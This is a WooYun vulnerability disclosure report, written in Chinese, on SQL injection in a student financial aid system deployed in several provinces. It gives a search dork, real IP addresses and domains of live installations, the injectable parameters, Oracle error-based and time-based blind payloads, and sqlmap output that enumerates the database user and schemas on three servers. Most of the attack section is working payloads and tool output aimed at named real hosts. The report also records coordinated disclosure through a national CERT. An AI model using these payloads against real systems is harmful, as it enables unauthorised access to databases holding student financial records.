漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-076423
漏洞标题:某多省在用资助管理系统存在通用SQL注入漏洞
相关厂商:南京君度科技有限公司
漏洞作者: Mr.leo
提交时间:2014-09-18 16:04
修复时间:2014-12-17 16:06
公开时间:2014-12-17 16:06
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-09-18: 细节已通知厂商并且等待厂商处理中
2014-09-23: 厂商已经确认,细节仅向厂商公开
2014-09-26: 细节向第三方安全合作伙伴开放
2014-11-17: 细节向核心白帽子及相关领域专家公开
2014-11-27: 细节向普通白帽子公开
2014-12-07: 细节向实习白帽子公开
2014-12-17: 细节向公众公开
简要描述:
Bomm!!!
详细说明:
WooYun: 某多省在用资助管理系统存在SQL注入漏洞 前人经验,除了glyxm有注入,xxmc也存在注入
http://music.google.cn/search?newwindow=1&q=infoms%2Fidentity%2Findex.c&btnG=Google+%E6%90%9C%E7%B4%A2
南京君度科技有限公司
部分例子
http://220.178.0.180/infoms/identity/index.c
http://218.76.27.109/infoms/identity/index.c
http://aid.ec.js.edu.cn/infoms/identity/index.c
http://202.119.175.107/infoms/identity/index.c
http://58.213.129.204/infoms/
http://58.213.129.204/infoms/visitor/getKpzh-list.c?glyxm=1&wdl=&xxmc=1
漏洞证明:
http://58.213.129.204/infoms/visitor/getKpzh-list.c?glyxm=1&wdl=&xxmc=1
Place: GET
Parameter: xxmc
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: glyxm=1&wdl=&xxmc=1' AND 4873=(SELECT UPPER(XMLType(CHR(60)||CHR(58
)||CHR(98)||CHR(121)||CHR(109)||CHR(58)||(SELECT (CASE WHEN (4873=4873) THEN 1 E
LSE 0 END) FROM DUAL)||CHR(58)||CHR(110)||CHR(112)||CHR(107)||CHR(58)||CHR(62)))
FROM DUAL) AND 'gYtA'='gYtA
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: glyxm=1&wdl=&xxmc=1' AND 9115=DBMS_PIPE.RECEIVE_MESSAGE(CHR(119)||C
HR(97)||CHR(76)||CHR(69),5) AND 'BsgG'='BsgG
---
there were multiple injection points, please select the one to use for following
injections:
[0] place: GET, parameter: xxmc, type: Single quoted string (default)
[1] place: GET, parameter: glyxm, type: Single quoted string
[q] Quit
> 0
[21:19:02] [INFO] the back-end DBMS is Oracle
web application technology: Nginx, JSP
back-end DBMS: Oracle
[21:19:02] [INFO] fetching current user
[21:19:02] [INFO] retrieved: USR_LOAN
current user: 'USR_LOAN'
[21:19:02] [INFO] fetching current database
[21:19:02] [INFO] resumed: USR_LOAN
current schema (equivalent to database on Oracle): 'USR_LOAN'
[21:19:02] [WARNING] schema names are going to be used on Oracle for enumeration
as the counterpart to database names on other DBMSes
[21:19:02] [INFO] fetching database (schema) names
[21:19:02] [INFO] the SQL query used returns 20 entries
[21:19:03] [INFO] retrieved: CTXSYS
[21:19:04] [INFO] retrieved: DBSNMP
[21:19:04] [INFO] retrieved: DMSYS
[21:19:05] [INFO] retrieved: EXFSYS
[21:19:05] [INFO] retrieved: MDSYS
[21:19:06] [INFO] retrieved: OLAPSYS
[21:19:06] [INFO] retrieved: ORDSYS
[21:19:07] [INFO] retrieved: OUTLN
[21:19:07] [INFO] retrieved: SYS
[21:19:08] [INFO] retrieved: SYSMAN
[21:19:08] [INFO] retrieved: SYSTEM
[21:19:09] [INFO] retrieved: TSMSYS
[21:19:09] [INFO] retrieved: USR_JCMS
[21:19:10] [INFO] retrieved: USR_JIANGSU
[21:19:10] [INFO] retrieved: USR_LOAN
[21:19:11] [INFO] retrieved: USR_LOAN_TEST
[21:19:11] [INFO] retrieved: USR_ZJ
[21:19:11] [INFO] retrieved: VIDEO
[21:19:12] [INFO] retrieved: WMSYS
[21:19:12] [INFO] retrieved: XDB
http://202.119.175.107/infoms/visitor/getKpzh-list.c?glyxm=1&wdl=&xxmc=1
Place: GET
Parameter: xxmc
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: glyxm=1&wdl=&xxmc=1' AND 5005=(SELECT UPPER(XMLType(CHR(60)||CHR(58
)||CHR(117)||CHR(107)||CHR(117)||CHR(58)||(SELECT (CASE WHEN (5005=5005) THEN 1
ELSE 0 END) FROM DUAL)||CHR(58)||CHR(116)||CHR(113)||CHR(102)||CHR(58)||CHR(62))
) FROM DUAL) AND 'oVNR'='oVNR
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: glyxm=1&wdl=&xxmc=1' AND 8587=DBMS_PIPE.RECEIVE_MESSAGE(CHR(97)||CH
R(120)||CHR(88)||CHR(68),5) AND 'Trmp'='Trmp
---
[21:20:03] [INFO] the back-end DBMS is Oracle
web application technology: Nginx, JSP
back-end DBMS: Oracle
[21:20:03] [INFO] fetching current user
[21:20:03] [INFO] retrieved: USR_LOAN
current user: 'USR_LOAN'
[21:20:03] [INFO] fetching current database
[21:20:03] [INFO] resumed: USR_LOAN
current schema (equivalent to database on Oracle): 'USR_LOAN'
[21:20:03] [WARNING] schema names are going to be used on Oracle for enumeration
as the counterpart to database names on other DBMSes
[21:20:03] [INFO] fetching database (schema) names
[21:20:04] [INFO] the SQL query used returns 20 entries
[21:20:04] [INFO] retrieved: CTXSYS
[21:20:04] [INFO] retrieved: DBSNMP
[21:20:05] [INFO] retrieved: DMSYS
[21:20:05] [INFO] retrieved: EXFSYS
[21:20:06] [INFO] retrieved: MDSYS
[21:20:06] [INFO] retrieved: OLAPSYS
[21:20:06] [INFO] retrieved: ORDSYS
[21:20:07] [INFO] retrieved: OUTLN
[21:20:07] [INFO] retrieved: SYS
[21:20:08] [INFO] retrieved: SYSMAN
[21:20:08] [INFO] retrieved: SYSTEM
[21:20:08] [INFO] retrieved: TSMSYS
[21:20:12] [INFO] retrieved: USR_JCMS
[21:20:12] [INFO] retrieved: USR_JIANGSU
[21:20:13] [INFO] retrieved: USR_LOAN
[21:20:13] [INFO] retrieved: USR_LOAN_TEST
[21:20:14] [INFO] retrieved: USR_ZJ
[21:20:14] [INFO] retrieved: VIDEO
[21:20:15] [INFO] retrieved: WMSYS
[21:20:15] [INFO] retrieved: XDB
http://aid.ec.js.edu.cn/infoms/visitor/getKpzh-list.c?glyxm=1&wdl=&xxmc=1
Place: GET
Parameter: xxmc
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: glyxm=1&wdl=&xxmc=1' AND 7775=(SELECT UPPER(XMLType(CHR(60)||CHR(58
)||CHR(107)||CHR(111)||CHR(114)||CHR(58)||(SELECT (CASE WHEN (7775=7775) THEN 1
ELSE 0 END) FROM DUAL)||CHR(58)||CHR(106)||CHR(98)||CHR(116)||CHR(58)||CHR(62)))
FROM DUAL) AND 'YVpq'='YVpq
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: glyxm=1&wdl=&xxmc=1' AND 9630=DBMS_PIPE.RECEIVE_MESSAGE(CHR(75)||CH
R(99)||CHR(70)||CHR(101),5) AND 'TVTR'='TVTR
---
[21:21:35] [INFO] the back-end DBMS is Oracle
web application technology: Nginx, JSP
back-end DBMS: Oracle
[21:21:35] [INFO] fetching current user
[21:21:35] [INFO] retrieved: USR_LOAN
current user: 'USR_LOAN'
[21:21:35] [INFO] fetching current database
[21:21:35] [INFO] resumed: USR_LOAN
current schema (equivalent to database on Oracle): 'USR_LOAN'
[21:21:35] [WARNING] schema names are going to be used on Oracle for enumeration
as the counterpart to database names on other DBMSes
[21:21:35] [INFO] fetching database (schema) names
[21:21:35] [INFO] the SQL query used returns 20 entries
[21:21:36] [INFO] retrieved: CTXSYS
[21:21:36] [INFO] retrieved: DBSNMP
[21:21:37] [INFO] retrieved: DMSYS
[21:21:37] [INFO] retrieved: EXFSYS
[21:21:37] [INFO] retrieved: MDSYS
[21:21:38] [INFO] retrieved: OLAPSYS
[21:21:38] [INFO] retrieved: ORDSYS
[21:21:38] [INFO] retrieved: OUTLN
[21:21:39] [INFO] retrieved: SYS
[21:21:39] [INFO] retrieved: SYSMAN
[21:21:40] [INFO] retrieved: SYSTEM
[21:21:40] [INFO] retrieved: TSMSYS
[21:21:41] [INFO] retrieved: USR_JCMS
[21:21:41] [INFO] retrieved: USR_JIANGSU
[21:21:42] [INFO] retrieved: USR_LOAN
[21:21:42] [INFO] retrieved: USR_LOAN_TEST
[21:21:43] [INFO] retrieved: USR_ZJ
[21:21:43] [INFO] retrieved: VIDEO
[21:21:44] [INFO] retrieved: WMSYS
[21:21:44] [INFO] retrieved: XDB
available databases [20]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] USR_JCMS
[*] USR_JIANGSU
[*] USR_LOAN
[*] USR_LOAN_TEST
[*] USR_ZJ
[*] VIDEO
[*] WMSYS
[*] XDB
修复方案:
过滤
版权声明:转载请注明来源 Mr.leo@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:14
确认时间:2014-09-23 08:39
厂商回复:
最新状态:
暂无